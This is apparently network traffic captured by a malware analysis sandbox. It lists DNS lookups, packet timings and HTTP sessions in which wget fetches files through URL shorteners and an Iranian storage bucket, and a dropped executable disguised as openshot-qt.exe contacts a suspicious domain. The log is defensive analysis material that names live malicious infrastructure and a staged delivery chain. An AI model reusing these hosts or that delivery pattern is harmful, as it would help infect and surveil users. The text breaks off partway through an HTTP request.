                                                                  Apr 26, 2023 09:01:35.443013906 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.443042994 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.591219902 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:35.593828917 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:35.593993902 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.597026110 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.597089052 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.744035959 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:35.746344090 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:35.746439934 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.748223066 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.748223066 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.895255089 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:35.897701979 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:35.898536921 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.905711889 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:35.905798912 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.052627087 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.055690050 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.056961060 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.059612989 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.059612989 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.208966017 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.214426041 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.214669943 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.217072964 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.217145920 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.363873005 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.366777897 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.368374109 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.391988039 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.391988039 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.538980007 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.541862011 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.544291019 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.546025038 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.546046019 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.692862034 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.696635008 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.696832895 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.699017048 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.699060917 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.771835089 CEST49717443192.168.2.35.181.156.27
                                                                  Apr 26, 2023 09:01:36.771894932 CEST443497175.181.156.27192.168.2.3
                                                                  Apr 26, 2023 09:01:36.771995068 CEST49717443192.168.2.35.181.156.27
                                                                  Apr 26, 2023 09:01:36.813711882 CEST49717443192.168.2.35.181.156.27
                                                                  Apr 26, 2023 09:01:36.813754082 CEST443497175.181.156.27192.168.2.3
                                                                  Apr 26, 2023 09:01:36.845864058 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.848640919 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:36.850477934 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.851660013 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.851691961 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:36.933659077 CEST443497175.181.156.27192.168.2.3
                                                                  Apr 26, 2023 09:01:36.933794975 CEST49717443192.168.2.35.181.156.27
                                                                  Apr 26, 2023 09:01:36.936851025 CEST49717443192.168.2.35.181.156.27
                                                                  Apr 26, 2023 09:01:36.936872005 CEST443497175.181.156.27192.168.2.3
                                                                  Apr 26, 2023 09:01:36.937495947 CEST443497175.181.156.27192.168.2.3
                                                                  Apr 26, 2023 09:01:36.978404045 CEST49717443192.168.2.35.181.156.27
                                                                  Apr 26, 2023 09:01:36.998442888 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.001262903 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.001396894 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.011219025 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.011219025 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.158421993 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.161623955 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.165066957 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.174132109 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.174132109 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.304580927 CEST49717443192.168.2.35.181.156.27
                                                                  Apr 26, 2023 09:01:37.322464943 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.325963020 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.328079939 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.331161976 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.331204891 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.351418972 CEST443497175.181.156.27192.168.2.3
                                                                  Apr 26, 2023 09:01:37.478514910 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.482691050 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.482790947 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.485013962 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.485070944 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:37.487101078 CEST443497175.181.156.27192.168.2.3
                                                                  Apr 26, 2023 09:01:37.487212896 CEST443497175.181.156.27192.168.2.3
                                                                  Apr 26, 2023 09:01:37.487284899 CEST49717443192.168.2.35.181.156.27
                                                                  Apr 26, 2023 09:01:37.488363028 CEST49717443192.168.2.35.181.156.27
                                                                  Apr 26, 2023 09:01:37.632030964 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.996436119 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:37.996637106 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:38.243671894 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:38.243673086 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:38.390702009 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:38.394639969 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:38.394865036 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:38.450011969 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:38.453090906 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:38.601695061 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:38.604259968 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:38.604396105 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:38.992100954 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:38.993176937 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.139877081 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.142348051 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.142514944 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.168019056 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.169189930 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.315891981 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.319140911 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.319377899 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.322227955 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.322319984 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.470242977 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.472908974 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.473036051 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.488818884 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.488877058 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.635658979 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.638633013 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.638746977 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.644784927 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.644785881 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.791721106 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.794539928 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.794734001 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.805903912 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.805903912 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.952882051 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.955837011 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:39.956065893 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.957730055 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:39.959481955 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.106242895 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.108752966 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.108942986 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.110811949 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.110862017 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.257780075 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.260902882 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.261125088 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.275237083 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.275237083 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.422367096 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.425354004 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.425517082 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.427639961 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.427639961 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.574606895 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.577438116 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.577613115 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.583091974 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.583138943 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.733936071 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.744373083 CEST804971654.204.22.198192.168.2.3
                                                                  Apr 26, 2023 09:01:40.744566917 CEST4971680192.168.2.354.204.22.198
                                                                  Apr 26, 2023 09:01:40.944314003 CEST4971680192.168.2.354.204.22.198
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 26, 2023 09:00:11.008738041 CEST5892153192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:00:11.035623074 CEST53589218.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:00:11.748316050 CEST6270453192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:00:11.782228947 CEST53627048.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:00:12.451270103 CEST4997753192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:00:12.583501101 CEST53499778.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:00:20.068454027 CEST5238753192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:00:20.068696976 CEST5692453192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:00:20.069679022 CEST6062553192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:00:20.101803064 CEST53569248.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:00:20.104892969 CEST53606258.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:00:20.112473011 CEST53523878.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:00:20.959626913 CEST5113953192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:00:20.959928036 CEST5295553192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:00:20.984810114 CEST53529558.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:00:20.985518932 CEST53511398.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:00:21.782541990 CEST5713453192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:00:21.798477888 CEST53571348.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:01:32.453900099 CEST5384853192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:01:32.489891052 CEST53538488.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:01:36.611017942 CEST5757153192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:01:36.753401041 CEST53575718.8.8.8192.168.2.3
                                                                  Apr 26, 2023 09:01:37.534423113 CEST5869153192.168.2.38.8.8.8
                                                                  Apr 26, 2023 09:01:37.564975023 CEST53586918.8.8.8192.168.2.3
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Apr 26, 2023 09:00:11.008738041 CEST192.168.2.38.8.8.80x81d5Standard query (0)tinyurl.comA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:11.748316050 CEST192.168.2.38.8.8.80xe8fcStandard query (0)empresas01.page.linkA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:12.451270103 CEST192.168.2.38.8.8.80x5ae9Standard query (0)contratoempresarial.s3.ir-tbz-sh1.arvanstorage.irA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.068454027 CEST192.168.2.38.8.8.80xd87eStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.068696976 CEST192.168.2.38.8.8.80xfb90Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.069679022 CEST192.168.2.38.8.8.80x3bb6Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.959626913 CEST192.168.2.38.8.8.80xd49aStandard query (0)img001.prntscr.comA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.959928036 CEST192.168.2.38.8.8.80xea69Standard query (0)bit.lyA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:21.782541990 CEST192.168.2.38.8.8.80xb09cStandard query (0)i1.wp.comA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:01:32.453900099 CEST192.168.2.38.8.8.80x8610Standard query (0)collect.installeranalytics.comA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:01:36.611017942 CEST192.168.2.38.8.8.80x5c4cStandard query (0)mondialarqcondicetchat.comA (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:01:37.534423113 CEST192.168.2.38.8.8.80xa7d6Standard query (0)amxx1515cabreun23.asxoA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Apr 26, 2023 09:00:11.035623074 CEST8.8.8.8192.168.2.30x81d5No error (0)tinyurl.com172.67.1.225A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:11.035623074 CEST8.8.8.8192.168.2.30x81d5No error (0)tinyurl.com104.20.139.65A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:11.035623074 CEST8.8.8.8192.168.2.30x81d5No error (0)tinyurl.com104.20.138.65A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:11.782228947 CEST8.8.8.8192.168.2.30xe8fcNo error (0)empresas01.page.link172.217.168.65A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:12.583501101 CEST8.8.8.8192.168.2.30x5ae9No error (0)contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir185.143.234.120A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:12.583501101 CEST8.8.8.8192.168.2.30x5ae9No error (0)contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir185.143.233.120A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.101803064 CEST8.8.8.8192.168.2.30xfb90No error (0)accounts.google.com142.250.203.109A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.104892969 CEST8.8.8.8192.168.2.30x3bb6No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.104892969 CEST8.8.8.8192.168.2.30x3bb6No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.112473011 CEST8.8.8.8192.168.2.30xd87eNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.112473011 CEST8.8.8.8192.168.2.30xd87eNo error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.984810114 CEST8.8.8.8192.168.2.30xea69No error (0)bit.ly67.199.248.11A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.984810114 CEST8.8.8.8192.168.2.30xea69No error (0)bit.ly67.199.248.10A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.985518932 CEST8.8.8.8192.168.2.30xd49aNo error (0)img001.prntscr.com104.23.139.12A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:20.985518932 CEST8.8.8.8192.168.2.30xd49aNo error (0)img001.prntscr.com104.23.140.12A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:00:21.798477888 CEST8.8.8.8192.168.2.30xb09cNo error (0)i1.wp.com192.0.77.2A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:01:32.489891052 CEST8.8.8.8192.168.2.30x8610No error (0)collect.installeranalytics.com54.204.22.198A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:01:32.489891052 CEST8.8.8.8192.168.2.30x8610No error (0)collect.installeranalytics.com3.222.139.61A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:01:36.753401041 CEST8.8.8.8192.168.2.30x5c4cNo error (0)mondialarqcondicetchat.com5.181.156.27A (IP address)IN (0x0001)false
                                                                  Apr 26, 2023 09:01:37.564975023 CEST8.8.8.8192.168.2.30xa7d6Name error (3)amxx1515cabreun23.asxononenoneA (IP address)IN (0x0001)false
                                                                  • tinyurl.com
                                                                  • empresas01.page.link
                                                                  • contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir
                                                                  • clients2.google.com
                                                                  • cdnjs.cloudflare.com
                                                                  • accounts.google.com
                                                                  • bit.ly
                                                                  • img001.prntscr.com
                                                                  • i1.wp.com
                                                                  • mondialarqcondicetchat.com
                                                                  • collect.installeranalytics.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.349696172.67.1.225443C:\Windows\SysWOW64\wget.exe
                                                                  TimestampkBytes transferredDirectionData


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.349697172.217.168.65443C:\Windows\SysWOW64\wget.exe
                                                                  TimestampkBytes transferredDirectionData


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  10192.168.2.349709104.23.139.12443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  11192.168.2.349711192.0.77.2443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  12192.168.2.34971267.199.248.11443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampkBytes transferredDirectionData


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  13192.168.2.3497175.181.156.27443C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe
                                                                  TimestampkBytes transferredDirectionData


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  14192.168.2.34971654.204.22.19880C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 26, 2023 09:01:32.642728090 CEST6125OUTPOST / HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                  User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                  Host: collect.installeranalytics.com
                                                                  Content-Length: 171
                                                                  Cache-Control: no-cache
                                                                  Apr 26, 2023 09:01:32.642831087 CEST6125OUTData Raw: 71 74 3d 34 36 37 38 35 34 36 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 36 34 34 38 34 61 61 37 37 66 39 31 66 62 31 31 36 39 39 66 30 30 62 39 26 61 76 3d 31 30 2e 32 30 2e 31 35 2e 32 37 26 63 69
                                                                  Data Ascii: qt=4678546&t=lifecycle&lc=start&v=3&aid=64484aa77f91fb11699f00b9&av=10.20.15.27&cid=3F91DB0A98A2A5E3D41F903C39905F3D5916F439&sid=%7BD7C38DEB-BD0A-46AE-9D80-25B933330C4D%7D
                                                                  Apr 26, 2023 09:01:32.794243097 CEST6126INHTTP/1.1 200 OK
                                                                  Cache-control: no-cache="set-cookie"
                                                                  Date: Wed, 26 Apr 2023 07:01:32 GMT
                                                                  Set-Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA;PATH=/;MAX-AGE=600
                                                                  X-Powered-By: Express
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Apr 26, 2023 09:01:32.810074091 CEST6126OUTPOST / HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                  User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                  Host: collect.installeranalytics.com
                                                                  Content-Length: 183
                                                                  Cache-Control: no-cache
                                                                  Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
                                                                  Apr 26, 2023 09:01:32.810260057 CEST6126OUTData Raw: 71 74 3d 34 36 37 38 39 35 33 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4e 54 26 76 61 6c 3d 31 30 30 30 26 76 3d 33 26 61 69 64 3d 36 34 34 38 34 61 61 37 37 66 39 31 66 62 31 31 36 39 39 66 30 30 62 39 26 61 76 3d 31 30
                                                                  Data Ascii: qt=4678953&t=property&lb=VersionNT&val=1000&v=3&aid=64484aa77f91fb11699f00b9&av=10.20.15.27&cid=3F91DB0A98A2A5E3D41F903C39905F3D5916F439&sid=%7BD7C38DEB-BD0A-46AE-9D80-25B933330C4D%7D
                                                                  Apr 26, 2023 09:01:32.960452080 CEST6127INHTTP/1.1 200 OK
                                                                  Date: Wed, 26 Apr 2023 07:01:32 GMT
                                                                  X-Powered-By: Express
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Apr 26, 2023 09:01:32.962099075 CEST6127OUTPOST / HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                  User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                  Host: collect.installeranalytics.com
                                                                  Content-Length: 185
                                                                  Cache-Control: no-cache
                                                                  Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
                                                                  Apr 26, 2023 09:01:32.962150097 CEST6127OUTData Raw: 71 74 3d 34 36 37 39 30 39 33 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4e 54 36 34 26 76 61 6c 3d 31 30 30 30 26 76 3d 33 26 61 69 64 3d 36 34 34 38 34 61 61 37 37 66 39 31 66 62 31 31 36 39 39 66 30 30 62 39 26 61 76 3d
                                                                  Data Ascii: qt=4679093&t=property&lb=VersionNT64&val=1000&v=3&aid=64484aa77f91fb11699f00b9&av=10.20.15.27&cid=3F91DB0A98A2A5E3D41F903C39905F3D5916F439&sid=%7BD7C38DEB-BD0A-46AE-9D80-25B933330C4D%7D
                                                                  Apr 26, 2023 09:01:33.112632036 CEST6127INHTTP/1.1 200 OK
                                                                  Date: Wed, 26 Apr 2023 07:01:33 GMT
                                                                  X-Powered-By: Express
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Apr 26, 2023 09:01:33.114609957 CEST6128OUTPOST / HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                  User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                  Host: collect.installeranalytics.com
                                                                  Content-Length: 188
                                                                  Cache-Control: no-cache
                                                                  Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C714AFACF77A4F69E095B13BEB54A44F6D6FDE76EA6BC261E999ADA8FB71057DDC1A795CE3E5815134F9A9936538410FA
                                                                  Apr 26, 2023 09:01:33.116610050 CEST6128OUTData Raw: 71 74 3d 34 36 37 39 32 35 30 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 50 68 79 73 69 63 61 6c 4d 65 6d 6f 72 79 26 76 61 6c 3d 38 31 39 31 26 76 3d 33 26 61 69 64 3d 36 34 34 38 34 61 61 37 37 66 39 31 66 62 31 31 36 39 39 66 30 30 62 39 26
                                                                  Data Ascii: qt=4679250&t=property&lb=PhysicalMemory&val=8191&v=3&aid=64484aa77f91fb11699f00b9&av=10.20.15.27&cid=3F91DB0A98A2A5E3D41F903C39905F3D5916F439&sid=%7BD7C38DEB-BD0A-46AE-9D80-25B933330C4D%7D
                                                                  Apr 26, 2023 09:01:33.269185066 CEST6128INHTTP/1.1 200 OK
                                                                  Date: Wed, 26 Apr 2023 07:01:33 GMT
                                                                  X-Powered-By: Express
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Apr 26, 2023 09:01:33.270638943 CEST6129OUTPOST / HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                  User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                  Host: collect.installeranalytics.com
                                                                  Content-Length: 184
                                                                  Cache-Control: no-cache
